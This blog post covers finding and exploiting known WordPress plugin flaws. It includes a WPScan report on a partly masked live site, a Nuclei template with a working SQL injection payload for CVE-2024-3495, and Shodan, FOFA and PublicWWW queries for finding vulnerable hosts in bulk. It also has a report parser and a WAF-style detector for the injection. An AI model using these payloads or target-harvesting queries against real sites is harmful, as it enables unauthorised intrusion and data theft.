Exploiting WordPress (Known vulnerabilities)
Finding and exploiting known vulnerabilities in WordPress websites, finding the targets and enumerating sub-domains.
Thanks for visiting! Over the past few weeks, I’ve been dedicating my time to discovering and analyzing vulnerabilities in WordPress websites, while also exploring various tools specifically designed for WordPress security testing. Throughout this journey, I’ve come across numerous insightful blogs and valuable resources shared by leading researchers in the field.
As many of us know, WordPress is a free and open-source content management system (CMS) built with PHP and backed by a MySQL or MariaDB database. It features a robust plugin architecture and a flexible template system. With a remarkable 78% market share, WordPress powers approximately 3.9 million websites—making it the most widely used CMS platform today.
You can go through the official WordPress documentation to understand its structure, or, from a security perspective, you can visit Patchstack academy to explore the detailed WordPress ecosystem, including plugins and themes. The vulnerabilities are explained very well here.
Another valuable resource for identifying and understanding WordPress vulnerabilities is WPScan, the official WordPress vulnerability database. WPScan also functions as a black-box vulnerability scanner and is distributed as a Ruby gem. It comes pre-installed on several security-focused Linux distributions such as Kali Linux, BlackArch, and Pentoo.
With the right combination of tools and reconnaissance techniques, it’s possible to uncover a significant number of vulnerable WordPress installations. Some of the key tools and resources I’ve utilized during these assessments include:
- ProjectDiscovery tools - a suite of open-source reconnaissance and scanning tools
- WPScan - WordPress security scanner
- WPwatcher - wrapper for WPScan that allows scheduled scans
- PublicWWW - search engine for source code
- Shodan or FOFA - search engines for Internet-exposed hosts
- crt.sh - certificate transparency search
- WPIntel - browser extension
For example, we’ll try to find websites running the WordPress plugin wp-jobsearch < 2.3.4, which is vulnerable to authentication bypass and is associated with CVE-2023-6584. There are two different approaches you can try: first, if you have a running WordPress website, you can run WPScan with an API token against the site (make sure you are authorized to do so).
Second, you can use Google search operators to find targets running WordPress. Below is a demo vulnerability report for a single website.
```text
sudo wpscan --api-token WuXM*** --url https://wordpress.com --force --random-user-agent --disable-tls-checks -f cli -o wp-pci-report.txt
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.25
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: https://jobs.*.co.in/ [141.*.*.182]
[+] Started: Sat Sep 21 10:57:12 2024

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] robots.txt found: https://jobs.*.co.in/robots.txt
 | Interesting Entries:
 | - /wp-content/uploads/wc-logs/
 | - /wp-content/uploads/woocommerce_transient_files/
 | - /wp-content/uploads/woocommerce_uploads/
 | - /wp-admin/
 | - /wp-admin/admin-ajax.php
 | Found By: Robots Txt (Aggressive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: https://jobs.*.co.in/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 | - http://codex.wordpress.org/XML-RPC_Pingback_API
 | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] wp-jobsearch
 | Location: https://jobs.*.co.in/wp-content/plugins/wp-jobsearch/
 | Last Updated: 2024-09-21T00:10:54.000Z
 | [!] The version is out of date, the latest version is 2.6.2
 |
 | Found By: Urls In Homepage (Passive Detection)
 | Confirmed By: Urls In 404 Page (Passive Detection)
 |
 | [!] 7 vulnerabilities identified:
 |
 | [!] Title: JobSearch WP Job Board < 2.3.4 - Arbitrary File Upload to RCE
 | Fixed in: 2.3.4
 | References:
 | - https://wpscan.com/vulnerability/757412f4-e4f8-4007-8e3b-639a72b33180
 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6585
 |
 | [!] Title: JobSearch WP Job Board < 2.3.4 - Authentication Bypass
 | Fixed in: 2.3.4
 | References:
 | - https://wpscan.com/vulnerability/e528e3cd-a45c-4bf7-a37a-101f5c257acd
 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6584
 |
 | [!] Title: JobSearch <= 2.3.4 - Authentication Bypass to Account Takeover
 | References:
 | - https://wpscan.com/vulnerability/16899f0d-5a0f-46cd-97f6-c778d643faac
 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-43245
 | - https://patchstack.com/database/vulnerability/wp-jobsearch/wordpress-jobsearch-plugin-2-3-4-unauthenticated-account-takeover-vulnerability
 |

[i] No Config Backups Found.

[+] WPScan DB API OK
 | Plan: free
 | Requests Done (during the scan): 11
 | Requests Remaining: 3

[+] Finished: Sat Sep 21 11:00:32 2024
[+] Requests Done: 1490
[+] Cached Requests: 9
[+] Data Sent: 486.062 KB
[+] Data Received: 31.157 MB
[+] Memory used: 265.246 MB
[+] Elapsed time: 00:03:20
```
The report shows that the site is affected by both authenticated and unauthenticated vulnerabilities. One finding in particular stands out: JobSearch WP Job Board < 2.3.4 - Authentication Bypass, tracked as CVE-2023-6584.
This is the exploit code that needs to be run in the browser console.
It allows an attacker to log in as any user knowing only that user's email address. The attack complexity is low and requires no technical expertise. To find a legitimate admin email, we can enumerate the login panel or use the WPIntel browser extension.
Please refer to the video PoC of the same.
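Reports like the one above pile up quickly when you scan many sites, so here is an added example (not from the original post or from WPScan) that parses WPScan's CLI report format into a per-plugin triage list: which version closes every listed finding, and which findings WPScan reports without a fix version and therefore need a mitigation rather than an update. The embedded report is a constructed, abridged copy of the one above with the hostname replaced.

```python
import re
# Constructed sample: an abridged copy of the WPScan report above (host replaced).
SAMPLE_REPORT = """\
[+] wp-jobsearch
 | Location: https://jobs.example.invalid/wp-content/plugins/wp-jobsearch/
 | [!] Title: JobSearch WP Job Board < 2.3.4 - Arbitrary File Upload to RCE
 | Fixed in: 2.3.4
 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6585
 | [!] Title: JobSearch WP Job Board < 2.3.4 - Authentication Bypass
 | Fixed in: 2.3.4
 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6584
 | [!] Title: JobSearch <= 2.3.4 - Authentication Bypass to Account Takeover
 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-43245
[i] No Config Backups Found.
"""

def parse_wpscan_cli(text):
    """Collect {plugin, title, fixed_in, cves} dicts; fixed_in is None when WPScan lists no fix."""
    findings, section, plugin, current = [], "", None, None
    for raw in text.splitlines():
        if raw[:4] in ("[+] ", "[i] ", "[!] "):      # new top-level section
            section, plugin, current = raw[4:].strip(), None, None
            continue
        line = raw.strip().lstrip("|").strip()       # drop the " | " margin
        if line.startswith("Location:") and "/wp-content/plugins/" in line:
            plugin = section                         # this section is a plugin
        elif line.startswith("[!] Title:") and plugin:
            current = {"plugin": plugin, "title": line[10:].strip(),
                       "fixed_in": None, "cves": []}
            findings.append(current)
        elif line.startswith("Fixed in:") and current:
            current["fixed_in"] = line[9:].strip()
        elif current:
            current["cves"] += re.findall(r"CVE-\d{4}-\d{4,}", line)
    return findings

def _ver(v):
    return tuple(int(p) for p in v.split("."))

def upgrade_targets(findings):
    """Per plugin: the version that closes every fixed finding, plus findings with no fix listed."""
    out = {}
    for f in findings:
        e = out.setdefault(f["plugin"], {"update_to": None, "no_fix_listed": []})
        if f["fixed_in"] is None:
            e["no_fix_listed"].append(f["title"])
        elif e["update_to"] is None or _ver(f["fixed_in"]) > _ver(e["update_to"]):
            e["update_to"] = f["fixed_in"]
    return out
```

Run it on a saved `-f cli` report to get, per plugin, the minimum version to update to and the findings that an update alone will not close.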
Another method is to use source code search engines to find vulnerable WordPress websites. I also suggest keeping an eye on new Nuclei templates for WordPress submitted by the community. Let's look at one of them, CVE-2024-3495 (WordPress Country State City Dropdown <= 2.7.2 - SQL Injection), rated critical with a CVSS score of 9.8. This template detects the Country State City Dropdown CF7 plugin for WordPress, which is vulnerable to SQL injection via the 'cnt' and 'sid' parameters in versions up to and including 2.7.2, due to insufficient escaping of user-supplied parameters.
```yaml
id: CVE-2024-3495

info:
  name: Wordpress Country State City Dropdown <=2.7.2 - SQL Injection
  author: apple
  severity: critical
  description: |
    The Country State City Dropdown CF7 plugin for WordPress is vulnerable to SQL Injection via the 'cnt' and 'sid' parameters in versions up to, and including, 2.7.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
  reference:
    - https://sploitus.com/exploit?id=EDF4B3F8-DDF4-5196-A375-EC81B8BC18F1&utm_source=rss&utm_medium=rss
    - https://github.com/truonghuuphuc/CVE-2024-3495-Poc
    - https://nvd.nist.gov/vuln/detail/CVE-2024-3495
    - https://plugins.trac.wordpress.org/browser/country-state-city-auto-dropdown/trunk/includes/ajax-actions.php#L22
    - https://plugins.trac.wordpress.org/browser/country-state-city-auto-dropdown/trunk/includes/ajax-actions.php#L8
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-3495
    cwe-id: CWE-89
    epss-score: 0.00065
    epss-percentile: 0.28393
  metadata:
    verified: true
    max-request: 2
    publicwww-query: "/wp-content/plugins/country-state-city-auto-dropdown"
  tags: cve,cve2024,wp,wp-plugin,wordpress,sqli

variables:
  num: "999999999"

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host:
        Content-Type: application/x-www-form-urlencoded

        action=tc_csca_get_cities&nonce_ajax=&sid=1+or+0+union+select+concat(0x64617461626173653a,(select%20md5()),0x7c76657273696f6e3a,(select%20md5()),0x7c757365723a,user()),2,3--+-

    matchers:
      - type: word
        part: body_2
        words:
          - ''

    extractors:
      - type: regex
        name: nonce
        group: 1
        regex:
          - '"nonce":"(\S*)"'
        internal: true
# digest: 4a0a00473045022059c57bd6c82e74ce84c99c339ccc1b107f2cb6aec5fa053b73b7f1aaa77003ac022100d3b0c3a42c10b8421de519da2237f3784bfd8b8a8d01f55fc6b08c58c59860c8:922c64590222798bb761d5b6d8e72950
```
If you look closely at the template, it includes a publicwww query that can be used to find more targets. Some queries I’ve used to find these targets are:
- **publicwww**: `depth:all "country-state-city-auto-dropdown"`
- **publicwww**: `"/wp-content/plugins/country-state-city-auto-dropdown"`
- **shodan**: `http.html:"/wp-content/plugins/country-state-city-auto-dropdown/"`
- **fofa**: `body="/wp-content/plugins/country-state-city-auto-dropdown/"`
These queries return thousands of URLs. You can feed those URLs to httpx for technology detection and availability checks.
Alternatively, you can feed the URLs to Nuclei (a list file can be passed as the argument). With Nuclei's -dreq switch we can see the actual HTTP request used to trigger the vulnerability. For this post I'm showing the result for a single website below.
To go further, we can inject queries manually or feed this request to sqlmap, marking the injection point with *. Here the vulnerable parameter is sid.
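From the defensive side, the template above tells you exactly what to watch for: admin-ajax.php requests for the action tc_csca_get_cities whose sid or cnt parameter carries anything but a plain numeric ID. Here is an added example (not from the original post, the plugin, or Nuclei) of that check as it could run in a reverse proxy or WAF rule, applied to constructed sample traffic; it assumes legitimate sid/cnt values are plain integers, which the advisory does not state explicitly.

```python
import re
from urllib.parse import parse_qs, urlsplit

TARGET_ACTIONS = {"tc_csca_get_cities"}   # AJAX action used by the template above
ID_PARAMS = ("sid", "cnt")                # parameters the advisory names as injectable
SQL_MARKERS = re.compile(r"\b(union|select|concat|or|and)\b|--|/\*|0x[0-9a-f]+", re.I)

def flag_request(method, target, body=""):
    """Return a reason if the request looks like an attempt on the vulnerable
    action, else None. Assumes (not from the advisory) that legitimate sid/cnt
    values are plain integer IDs, so anything else is worth blocking or logging."""
    url = urlsplit(target)
    if not url.path.endswith("/wp-admin/admin-ajax.php"):
        return None
    params = parse_qs(url.query)
    if method.upper() == "POST":                      # form body carries params too
        for k, v in parse_qs(body).items():
            params.setdefault(k, []).extend(v)
    if not TARGET_ACTIONS & set(params.get("action", [])):
        return None
    for name in ID_PARAMS:
        for value in params.get(name, []):
            if not value.isdigit():
                kind = "sql-like" if SQL_MARKERS.search(value) else "non-numeric"
                return f"{name}={value!r} is {kind}"
    return None

# Constructed sample traffic as a reverse proxy would see it: (method, target, body).
SAMPLE_REQUESTS = [
    ("POST", "/wp-admin/admin-ajax.php", "action=tc_csca_get_cities&nonce_ajax=a1b2&sid=42"),
    ("POST", "/wp-admin/admin-ajax.php",
     "action=tc_csca_get_cities&nonce_ajax=a1b2&sid=1+or+0+union+select+1,2,3--+-"),
    ("GET", "/wp-admin/admin-ajax.php?action=tc_csca_get_cities&cnt=7a", ""),
    ("GET", "/wp-admin/admin-ajax.php?action=heartbeat&sid=not-a-number", ""),
]

def scan(requests):
    """Index and reason for every flagged request."""
    hits = []
    for i, (method, target, body) in enumerate(requests):
        reason = flag_request(method, target, body)
        if reason:
            hits.append((i, reason))
    return hits

if __name__ == "__main__":
    for i, reason in scan(SAMPLE_REQUESTS):
        print(f"request {i}: {reason}")
```

The real fix is updating the plugin past 2.7.2; a rule like this only buys time and gives you a log signal for attempts against hosts you have not patched yet.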
A last alternative for mass-scanning targets for all known vulnerabilities is WPwatcher (installation is not covered here). WPwatcher is a wrapper for WPScan that manages scans of multiple sites and reports by email and/or syslog; you can schedule scans and get notified when vulnerabilities, outdated plugins and other risks are found. You can refer to the official documentation here.
Note: If you run WPScan or WPwatcher against a target without the API token, it won't show the vulnerabilities. You have to register on https://wpscan.com and grab the API token from the profile section, which allows your scans to perform 23 requests per day. I created three accounts with three different emails to get more requests.
This is a sample WPwatcher result for reference.
I hope you found this post helpful. Please find some reference links below for further reading.
